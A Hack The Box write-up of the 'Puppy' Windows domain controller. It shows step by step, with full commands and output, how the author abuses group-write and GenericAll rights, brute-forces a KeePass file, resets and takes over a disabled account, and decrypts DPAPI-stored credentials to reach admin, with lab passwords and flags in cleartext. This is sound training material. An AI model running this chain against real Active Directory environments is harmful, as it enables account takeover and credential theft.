Hackthebox: Puppy

Foued SAIDI

Overview

Puppy is a medium-difficulty Windows machine from Hack The Box. We start with low-privilege domain credentials and find a DEV SMB share that is restricted to the DEVELOPERS group; a write right over that group lets us add ourselves to it, and inside the share we find a KeePass database (recovery.kdbx) whose master password we crack. The credentials in it give us ant.edwards, whose SENIOR DEVS membership grants GenericAll over the disabled adam.silver account: we re-enable it, reset its password and get a WinRM shell. A site backup on disk leaks steph.cooper's password, which lets us decrypt her DPAPI master key and the saved credential of steph.cooper_adm, an account that gets us the root flag.


Reconnaissance

PORT     STATE SERVICE       VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-18 15:00:26Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m04s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-18T15:02:35
|_ start_date: N/A

The port list tells us this is a domain controller: Kerberos (88), LDAP/LDAPS (389, 636) and the global catalog ports (3268, 3269) alongside DNS (53) and SMB (445), with the domain reported as PUPPY.HTB and the host named DC. Two things are worth noting for later: SMB signing is required, so relaying SMB authentication to this host is off the table, and the clock skew of roughly seven hours will break Kerberos authentication (tickets are only accepted within a five-minute window) unless we sync our clock against 10.10.11.70 or run Kerberos-dependent tools under faketime. NFS (2049) and iSCSI (3260) are also exposed but are not needed for this path.

Domain enumeration

The box is an assumed-breach scenario: we are given the credentials levi.james:KingofAkron2025!. With those we can enumerate domain users and groups by brute-forcing RIDs (SID-to-name lookups over LSARPC work for any authenticated account):

┌──(kali㉿kali)-[~]
└─$ nxc smb 10.10.11.70 -u 'levi.james' -p 'KingofAkron2025!' --rid-brute
[*] Initializing NFS protocol database
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB 10.10.11.70 445 DC 498: PUPPY\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.70 445 DC 500: PUPPY\Administrator (SidTypeUser)
SMB 10.10.11.70 445 DC 501: PUPPY\Guest (SidTypeUser)
SMB 10.10.11.70 445 DC 502: PUPPY\krbtgt (SidTypeUser)
SMB 10.10.11.70 445 DC 512: PUPPY\Domain Admins (SidTypeGroup)
SMB 10.10.11.70 445 DC 513: PUPPY\Domain Users (SidTypeGroup)
SMB 10.10.11.70 445 DC 514: PUPPY\Domain Guests (SidTypeGroup)
SMB 10.10.11.70 445 DC 515: PUPPY\Domain Computers (SidTypeGroup)
SMB 10.10.11.70 445 DC 516: PUPPY\Domain Controllers (SidTypeGroup)
SMB 10.10.11.70 445 DC 517: PUPPY\Cert Publishers (SidTypeAlias)
SMB 10.10.11.70 445 DC 518: PUPPY\Schema Admins (SidTypeGroup)
SMB 10.10.11.70 445 DC 519: PUPPY\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.70 445 DC 520: PUPPY\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.70 445 DC 521: PUPPY\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.70 445 DC 522: PUPPY\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.70 445 DC 525: PUPPY\Protected Users (SidTypeGroup)
SMB 10.10.11.70 445 DC 526: PUPPY\Key Admins (SidTypeGroup)
SMB 10.10.11.70 445 DC 527: PUPPY\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.70 445 DC 553: PUPPY\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.70 445 DC 571: PUPPY\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.70 445 DC 572: PUPPY\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.70 445 DC 1000: PUPPY\DC$ (SidTypeUser)
SMB 10.10.11.70 445 DC 1101: PUPPY\DnsAdmins (SidTypeAlias)
SMB 10.10.11.70 445 DC 1102: PUPPY\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.70 445 DC 1103: PUPPY\levi.james (SidTypeUser)
SMB 10.10.11.70 445 DC 1104: PUPPY\ant.edwards (SidTypeUser)
SMB 10.10.11.70 445 DC 1105: PUPPY\adam.silver (SidTypeUser)
SMB 10.10.11.70 445 DC 1106: PUPPY\jamie.williams (SidTypeUser)
SMB 10.10.11.70 445 DC 1107: PUPPY\steph.cooper (SidTypeUser)
SMB 10.10.11.70 445 DC 1108: PUPPY\HR (SidTypeGroup)
SMB 10.10.11.70 445 DC 1109: PUPPY\SENIOR DEVS (SidTypeGroup)
SMB 10.10.11.70 445 DC 1111: PUPPY\steph.cooper_adm (SidTypeUser)
SMB 10.10.11.70 445 DC 1112: PUPPY\Access-Denied Assistance Users (SidTypeAlias)
SMB 10.10.11.70 445 DC 1113: PUPPY\DEVELOPERS (SidTypeGroup)

Besides the built-in objects, the list gives us five people (levi.james, ant.edwards, adam.silver, jamie.williams, steph.cooper), a separate administrative-looking account steph.cooper_adm, and three custom groups: HR, SENIOR DEVS and DEVELOPERS. Next we collect the domain with bloodhound-python. The Kerberos warning below is caused by our system resolver not knowing dc.puppy.htb (the -ns option only covers bloodhound-python's own lookups); an /etc/hosts entry for dc.puppy.htb fixes it, and the NTLM fallback is enough for collection anyway:

┌──(kali㉿kali)-[~]
└─$ bloodhound-python -c All -u levi.james -p 'KingofAkron2025!' -d puppy.htb -ns 10.10.11.70 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.puppy.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.puppy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.puppy.htb
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 01M 59S
INFO: Compressing output into 20250518080341_bloodhound.zip

Also checking SMB shares, we find an interesting DEV share:

┌──(kali㉿kali)-[~]
└─$ smbclient -L \\\\10.10.11.70\\ -U levi.james%'KingofAkron2025!'

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk DEV-SHARE for PUPPY-DEVS
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.70 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

SMB share access

The DEV share is restricted to members of the DEVELOPERS group, but BloodHound shows a path from our own user to that group: levi.james holds a write right over DEVELOPERS that allows modifying its membership, so he can add members to it, including himself:

(BloodHound screenshot: path from levi.james to the DEVELOPERS group)

So let’s add levi to the group and get whats inside the share:

┌──(kali㉿kali)-[~]
└─$ bloodyAD -d puppy.htb -u levi.james -p 'KingofAkron2025!' --host dc.puppy.htb --dc-ip 10.10.11.70 add groupMember "DEVELOPERS" levi.james
[+] levi.james added to DEVELOPERS

┌──(kali㉿kali)-[~]
└─$ smbclient \\\\dc.puppy.htb\\DEV -U puppy.htb/levi.james
Password for [PUPPY.HTB\levi.james]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Mar 23 07:07:57 2025
.. D 0 Sat Mar 8 16:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 07:09:12 2025
Projects D 0 Sat Mar 8 16:53:36 2025
recovery.kdbx A 2677 Wed Mar 12 02:25:46 2025

5080575 blocks of size 4096. 1544684 blocks available
smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \> cd Projects
smb: \Projects\> ls
. D 0 Sat Mar 8 16:53:36 2025
.. DR 0 Sun Mar 23 07:07:57 2025

5080575 blocks of size 4096. 1544684 blocks available
smb: \Projects\>

We find a KeePass database. keepass2john only understands KDBX 3.x and refuses newer KDBX 4 files, so instead of extracting a hash for john we use keepass4brute, which tries each candidate password by invoking keepassxc-cli. This is slow (about 69 attempts per minute here, which would take months to exhaust rockyou), so we are betting on the password being near the top of the list:

┌──(kali㉿kali)-[~/keepass4brute]
└─$ ./keepass4brute.sh ../recovery.kdbx /usr/share/wordlists/rockyou.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute

[+] Words tested: 36/14344392 - Attempts per minute: 69 - Estimated time remaining: 20 weeks, 4 days
[+] Current attempt: liverpool

[*] Password found: liverpool
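
Before committing hours to a brute force it pays to check which KDBX version you are dealing with, since that decides whether keepass2john (fast, offline hash for john or hashcat) or keepassxc-cli driven by keepass4brute (slow) is the right tool. The following is an added example, not part of the original post: it parses the first twelve bytes of a .kdbx file (two signature words and a packed version word) and reports the route. The header bytes it runs against are constructed for the demonstration, not taken from the box's recovery.kdbx.

```python
import struct

KDBX_SIG1 = 0x9AA2D903   # first signature word, shared by all KeePass 2.x databases
KDBX_SIG2 = 0xB54BFB67   # second signature word for KDBX 2.x release files


def kdbx_version(header: bytes) -> tuple:
    """Return (major, minor) from the 12-byte KDBX file header.

    Layout (three little-endian uint32): signature1, signature2, version,
    where version packs the major number in the high 16 bits and the
    minor number in the low 16 bits (0x00040000 is KDBX 4.0, 0x00030001 is 3.1).
    """
    if len(header) < 12:
        raise ValueError("need at least 12 bytes of header")
    sig1, sig2, version = struct.unpack("<3I", header[:12])
    if sig1 != KDBX_SIG1 or sig2 != KDBX_SIG2:
        raise ValueError(f"not a KDBX 2.x database: {sig1:#010x} {sig2:#010x}")
    return version >> 16, version & 0xFFFF


def cracking_route(header: bytes) -> str:
    """Pick the tooling to reach for, based on the format version."""
    major, minor = kdbx_version(header)
    if major >= 4:
        # KDBX 4.x: keepass2john refuses the file, so brute force through
        # keepassxc-cli (which is what keepass4brute wraps).
        return f"KDBX {major}.{minor}: use keepass4brute / keepassxc-cli"
    return f"KDBX {major}.{minor}: keepass2john -> john/hashcat"


def make_header(major: int, minor: int) -> bytes:
    """Constructed sample header for the demonstration (not from recovery.kdbx)."""
    return struct.pack("<3I", KDBX_SIG1, KDBX_SIG2, (major << 16) | minor)


if __name__ == "__main__":
    for hdr in (make_header(4, 0), make_header(3, 1)):
        print(cracking_route(hdr))
    # Against a real file: cracking_route(open("recovery.kdbx", "rb").read(12))
```

Only the first twelve bytes are read, so the check costs nothing even on a large database; everything after them (cipher ID, KDF parameters) is where a 4.x file differs, which is exactly what keepass2john does not parse.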

We open the database and fetch these credentials:

ADAM SILVER:HJKL2025!
ANTONY C. EDWARDS:Antman2025!
JAMIE WILLIAMSON:JamieLove2025!
SAMUEL BLAKE:ILY2025!
STEVE TUCKER:Steve2025!

Back in BloodHound, jamie.williams, adam.silver and ant.edwards are all members of the DEVELOPERS group, and ant.edwards has some more interesting access through his SENIOR DEVS membership:

(BloodHound screenshot: DEVELOPERS membership and ant.edwards' outbound control)

Members of SENIOR DEVS have GenericAll over ADAM.SILVER, and adam.silver is allowed to connect to the DC over WinRM (BloodHound shows it as a CanPSRemote edge), so full control of that account means a shell:

(BloodHound screenshot: SENIOR DEVS GenericAll over ADAM.SILVER, who can PS-remote to DC)

BloodHound also flags the adam.silver account as disabled:

(BloodHound screenshot: adam.silver node properties, account disabled)

GenericAll lets us fix that. First we clear the ACCOUNTDISABLE bit in userAccountControl using ant.edwards' credentials:

┌──(kali㉿kali)-[~/keepass4brute]
└─$ bloodyAD --host dc.puppy.htb -d 10.10.11.70 -u ant.edwards -p 'Antman2025!' remove uac adam.silver -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl

Then we reset his password and log in over WinRM for the user flag. A password reset is loud and locks the legitimate user out; on a real engagement GenericAll also allows quieter routes such as shadow credentials or a targeted Kerberoast, but on a lab box a reset is fine:

┌──(kali㉿kali)-[~/keepass4brute]
└─$ bloodyAD --host dc.puppy.htb -d 10.10.11.70 -u ant.edwards -p 'Antman2025!' set password adam.silver 'kujenStrongPassword123!'
[+] Password changed successfully!

┌──(kali㉿kali)-[~/keepass4brute]
└─$ evil-winrm -i dc.puppy.htb -u adam.silver -p 'kujenStrongPassword123!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.silver\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\adam.silver\desktop> cat user.txt
49cdbfd4295bf3d0fa438a7ed40291ca

Privilege Escalation - DPAPI abuse

While looking around the filesystem as adam.silver we find a C:\backups folder holding a site backup, which we pull back for offline inspection:

*Evil-WinRM* PS C:\backups> download site-backup-2024-12-30.zip

Info: Downloading C:\backups\site-backup-2024-12-30.zip to site-backup-2024-12-30.zip

Info: Download successful!
*Evil-WinRM* PS C:\backups>

Grepping the extracted archive for passwords turns up an LDAP bind password in a configuration backup:

nms-auth-config.xml.bak:        <bind-password>ChefSteph2025!</bind-password>

It is the password of steph.cooper (worth validating against SMB with nxc before building on it):

steph.cooper:ChefSteph2025!

Logged in over WinRM as steph.cooper, we go after DPAPI. The Credentials folder under AppData\Roaming\Microsoft holds a saved credential blob; it is encrypted under a master key stored in Protect\<SID>\<GUID>, and that master key is itself encrypted with a key derived from the user's password and SID, both of which we now have. The SID's RID (1107) matches steph.cooper from the RID brute-force, and the 24-byte Preferred file names the master key GUID currently in use. Both locations are hidden and system files, hence get-childitem -force:

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> download C8D69EBE9A43E9DEBF6B5FBD48B521B9

Info: Downloading C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 to C8D69EBE9A43E9DEBF6B5FBD48B521B9



*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> get-childitem -force


Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:40 AM 740 556a2412-1275-4ccf-b721-e6a0b4f90407
-a-hs- 2/23/2025 2:36 PM 24 Preferred


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> download 556a2412-1275-4ccf-b721-e6a0b4f90407

Info: Downloading C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407 to 556a2412-1275-4ccf-b721-e6a0b4f90407

Now we decrypt offline with impacket's dpapi tool: first the master key, from the password and SID (impacket derives candidate keys from them and reports which one worked), then the credential blob with the recovered master key:

┌──(kali㉿kali)-[~/keepass4brute]
└─$ impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -password 'ChefSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

┌──(kali㉿kali)-[~/keepass4brute]
└─$ impacket-dpapi credential -f C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!
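
What impacket-dpapi did above deserves spelling out. The master key file is encrypted with a key derived from the account password and SID: impacket computes an HMAC-SHA1 over the NUL-terminated UTF-16LE SID, keyed either with SHA1 of the password (local accounts) or with the NT hash, i.e. MD4 of the UTF-16LE password (domain accounts), and the "User Key (MD4 protected)" line tells us the NT-hash variant is the one that unlocked steph.cooper's key. The Preferred file in the Protect folder is simply the GUID of the master key in use followed by a FILETIME. The following is an added example, not from the original post and not impacket's code: it parses a Preferred blob constructed from the GUID we downloaded (the timestamp is made up) and derives the two candidate pre-keys for the page's password and SID. It ships its own MD4 because hashlib frequently lacks md4 under OpenSSL 3. The pre-key is only the first step; the actual master key decryption (PBKDF2 with the file's salt and iteration count, then the block cipher and HMAC check) is left to impacket.

```python
import hashlib
import hmac
import struct
import uuid
from datetime import datetime, timedelta, timezone


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python. NT hashes need it, and hashlib often
    refuses 'md4' under OpenSSL 3 without the legacy provider."""
    def rol(x, s):
        return ((x << s) | (x >> (32 - s))) & 0xFFFFFFFF

    # Per round: boolean function, additive constant, message-word schedule, shifts.
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         lambda i: i, (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         lambda i: (i % 4) * 4 + i // 4, (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         lambda i: (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4], (3, 9, 11, 15)),
    )
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", 8 * len(data))          # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = state[:]
        for f, k, word, shifts in rounds:
            for i in range(16):
                a, b, c, d = (s[(j - i) % 4] for j in range(4))  # registers rotate each step
                s[(-i) % 4] = rol((a + f(b, c, d) + x[word(i)] + k) & 0xFFFFFFFF,
                                  shifts[i % 4])
        state = [(u + v) & 0xFFFFFFFF for u, v in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash: MD4 over the UTF-16LE encoded password."""
    return md4(password.encode("utf-16le"))


def dpapi_user_keys(password: str, sid: str) -> dict:
    """The two candidate pre-keys impacket derives from a password and SID
    (the third one, for Protected Users members, is omitted). Both are
    HMAC-SHA1 over the NUL-terminated UTF-16LE SID; only the HMAC key differs:
    SHA1 of the password for local accounts, the NT hash for domain accounts."""
    sid_utf16 = (sid + "\0").encode("utf-16le")
    return {
        "sha1": hmac.new(hashlib.sha1(password.encode("utf-16le")).digest(),
                         sid_utf16, hashlib.sha1).digest(),
        "md4": hmac.new(nt_hash(password), sid_utf16, hashlib.sha1).digest(),
    }


EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime(when: datetime) -> int:
    """Windows FILETIME: 100-nanosecond ticks since 1601-01-01 UTC."""
    return ((when - EPOCH_1601) // timedelta(microseconds=1)) * 10


def parse_preferred(blob: bytes) -> tuple:
    """Protect\\<SID>\\Preferred is 24 bytes: the GUID of the master key
    currently in use (Windows mixed-endian layout) followed by a FILETIME."""
    if len(blob) != 24:
        raise ValueError("Preferred must be exactly 24 bytes")
    guid = uuid.UUID(bytes_le=blob[:16])
    (ft,) = struct.unpack("<Q", blob[16:])
    return str(guid), EPOCH_1601 + timedelta(microseconds=ft // 10)


def make_preferred(guid: str, ft: int) -> bytes:
    """Build a Preferred blob; used here only to construct sample input."""
    return uuid.UUID(guid).bytes_le + struct.pack("<Q", ft)


# Constructed sample: the GUID is the master key file we pulled from the box,
# the timestamp is made up for the demonstration.
SAMPLE_GUID = "556a2412-1275-4ccf-b721-e6a0b4f90407"
SAMPLE_FILETIME = filetime(datetime(2025, 3, 8, 7, 40, tzinfo=timezone.utc))
STEPH_SID = "S-1-5-21-1487982659-1829050783-2281216199-1107"   # RID 1107 = steph.cooper


if __name__ == "__main__":
    guid, when = parse_preferred(make_preferred(SAMPLE_GUID, SAMPLE_FILETIME))
    print(f"preferred master key: {guid} ({when:%Y-%m-%d %H:%M} UTC)")
    for name, key in dpapi_user_keys("ChefSteph2025!", STEPH_SID).items():
        print(f"{name:4} pre-key: {key.hex()}")
```

The SID is part of the key material, which is why impacket needs -sid and why a guessed or mistyped SID silently yields a key that fails to decrypt anything; cross-checking the RID against the --rid-brute output is the cheap sanity check. Note too that the NT hash alone is enough for the domain variant: a pass-the-hash position on the account gives you its DPAPI secrets without ever learning the cleartext.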

The saved credential is for steph.cooper_adm. That password gets us an administrative WinRM session and the root flag:

┌──(kali㉿kali)-[~/keepass4brute]
└─$ evil-winrm -i dc.puppy.htb -u steph.cooper_adm -p 'FivethChipOnItsWay2025!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\steph.cooper_adm\Documents> cd ../../administrator/desktop
*Evil-WinRM* PS C:\Users\administrator\desktop> cat root.txt
e75a02a424d6c3f3867a215c9fb8a4f7

That was it for Puppy, hope you learned something new!
-0xkujen

  • Title: Hackthebox: Puppy
  • Author: Foued SAIDI
  • Created at : 2025-09-27 10:09:22
  • Updated at : 2025-09-27 10:51:02
  • Link: https://kujen5.github.io/2025/09/27/Hackthebox-Puppy/
  • License: This work is licensed under CC BY-NC-SA 4.0.